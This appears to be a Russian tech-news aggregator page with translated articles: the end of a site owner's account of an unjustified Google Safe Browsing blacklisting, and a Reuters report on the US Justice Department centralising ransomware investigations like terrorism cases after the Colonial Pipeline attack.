  • Если сайт действительно взломан, устраните проблему (например, удалите оскорбительный контент или взломанные страницы), а затем запросите проверку безопасности. Если сайт не взломан или отчёт Safe Browsing бессмысленный, в любом случае запросите проверку безопасности и заявите, что отчёт является неполным.
  • Затем, вместо того чтобы метаться в агонии, представляя суммы ущерба за время ожидания, всё равно приступайте к переходу на новый домен. Проверка может занять несколько недель.

Вишенка на торте


Спустя несколько месяцев после первого инцидента, мы получили письмо от Search Console с сообщением, что один из наших доменов опять попал в чёрный список. Через несколько часов мне как администратору домена G Suite пришло ещё одно интересное письмо, которое вы можете прочитать ниже.


sc в sc-noreply@google.com расшифровывается как Search Console

Позвольте объяснить своими словами, что это такое, потому что это просто умопомрачительно. Речь идёт о письме с предупреждением от Search Console о включении в чёрный список. В этом втором письме говорится, что автоматический фишинговый фильтр электронной почты G Suite считает поддельным это письмо от Google Search Console. Безусловно, это не так, поскольку наш домен действительно был занесён в чёрный список. Таким образом, Google даже не может решить, являются ли фишингом её собственные оповещения о фишинге. (LOL?)

Некоторые неприятные мысли о будущем интернета


Любому, кто работает в сфере технологий, совершенно ясно, что крупные техногиганты в значительной степени являются хранителями Интернета. Но раньше я интерпретировал это в свободном, метафорическом смысле. Описанный здесь инцидент с Safe Browsing очень ясно показал, что Google буквально контролирует, кто может получить доступ к вашему сайту, независимо от того, где и как вы им управляете. Поскольку Chrome занимает около 70% рынка, а Firefox и Safari в какой-то степени используют базу данных GSB, то Google может одним движением пальца сделать любой сайт практически недоступным в интернете.
Подробнее..

Перевод Эксклюзив США по словам чиновника, взломы с помощью программ-вымогателей надо приравнять к терроризму

04.06.2021 16:20:58 | Автор: admin
image

Вашингтон (Рейтер) Министерство юстиции США считает расследования атак с использованием программ-вымогателей таким же важным, как и терроризм. После взлома Colonial Pipeline и увеличения ущерба, нанесенного киберпреступниками, сообщил Reuters высокопоставленный чиновник ведомства.

Внутреннее руководство, направленное в четверг в офисы прокуратуры США по всей стране, гласит, что информация о расследованиях программ-вымогателей на местах должна централизованно координироваться с недавно созданной целевой группой в Вашингтоне.

Это специализированный процесс, обеспечивающий отслеживание всех случаев использования программ-вымогателей, независимо от того, где они могут быть переданы в этой стране, так что вы можете установить связи между исполнителями и продвигаться вверх, чтобы разрушить всю цепочку , сказал Джон Карлин, главный помощник заместителя генерального прокурора Министерства юстиции.

В прошлом месяце киберпреступная группа, которая, по утверждениям властей США, действует из России, проникла к операторам трубопровода на восточном побережье США. Блокирует системы и требует выкупа. Взлом вызвал остановку на несколько дней, резкий скачок цен на газ, панические закупки и локализацию дефицита топлива на юго-востоке.

По словам представителей компании, Colonial Pipeline решила заплатить хакерам, вторгшимся в их системы, почти 5 миллионов долларов за восстановление доступа.
В руководстве Министерства юстиции конкретно упоминается Colonial как пример растущей угрозы, которую представляют для страны программы-вымогатели и цифровое вымогательство.

Чтобы убедиться, что мы можем установить необходимые связи между национальными и глобальными делами и расследованиями, и для полной картины угроз национальной и экономической безопасности, с которыми мы сталкиваемся, мы должны усилить и централизовать наше внутреннее отслеживание , говорится в руководстве, рассмотренном Reuters и ранее не опубликованном.

По словам официальных лиц США, решение Министерства юстиции о включении программ-вымогателей в этот специальный процесс демонстрирует, как проблема становится приоритетной.

Мы уже использовали эту модель в отношении терроризма, но никогда не использовали против программ-вымогателей, сказал Карлин. По словам юридических экспертов, этот процесс обычно ограничивается кратким списком тем, включая дела о национальной безопасности.

На практике это означает, что следователи прокуратуры США, занимающиеся атаками программ-вымогателей, должны будут делиться обновленными подробностями дел и оперативной технической информацией с руководителями в Вашингтоне.

Руководство также просит офисы рассмотреть и задействовать другие расследования, сосредоточенные на более крупной экосистеме киберпреступности.

Согласно руководству, список расследований, которые теперь требуют централизованного уведомления, включает дела, связанные с: противодействующими антивирусными службами, незаконными онлайн-форумами или торговыми площадками, биржами криптовалют, пуленепробиваемыми услугами хостингов, ботнеты и услуги по отмыванию денег в Интернете.

Под услугами пуленепробиваемого хостинга подразумевают услуги регистрации непрозрачной интернет-инфраструктуры, которая помогает киберпреступникам анонимно проводить вторжения.

Ботнет это группа скомпрометированных подключенных к Интернету устройств, которыми можно манипулировать, чтобы вызвать цифровой хаос.

Хакеры создают, покупают и сдают в аренду бот-сети для совершения киберпреступлений, начиная от рекламного мошенничества и заканчивая крупными кибератаками.

Мы действительно хотим убедиться, что прокуроры и следователи по уголовным делам сообщают и отслеживают криптовалютные биржи, незаконные онлайн-форумы или торговые площадки, где люди продают хакерские инструменты, учетные данные для доступа к сети, которые служат множествам целей , сказал Карлин.

Марк Калифано, бывший прокурор США и эксперт по киберпреступности, сказал, что усиление отчетности может позволить Министерству юстиции более эффективно использовать ресурсы и выявлять распространенные эксплойты, используемые киберпреступниками.
Подробнее..

Категории

Последние комментарии

  • Имя: Макс
    24.08.2022 | 11:28
    Я разраб в IT компании, работаю на арбитражную команду. Мы работаем с приламы и сайтами, при работе замечаются постоянные баны и лаги. Пацаны посоветовали сервис по анализу исходного кода,https://app Подробнее..
  • Имя: 9055410337
    20.08.2022 | 17:41
    поможем пишите в телеграм Подробнее..
  • Имя: sabbat
    17.08.2022 | 20:42
    Охренеть.. это просто шикарная статья, феноменально круто. Большое спасибо за разбор! Надеюсь как-нибудь с тобой связаться для обсуждений чего-либо) Подробнее..
  • Имя: Мария
    09.08.2022 | 14:44
    Добрый день. Если обладаете такой информацией, то подскажите, пожалуйста, где можно найти много-много материала по Yggdrasil и его уязвимостях для написания диплома? Благодарю. Подробнее..
© 2006-2024, personeltest.ru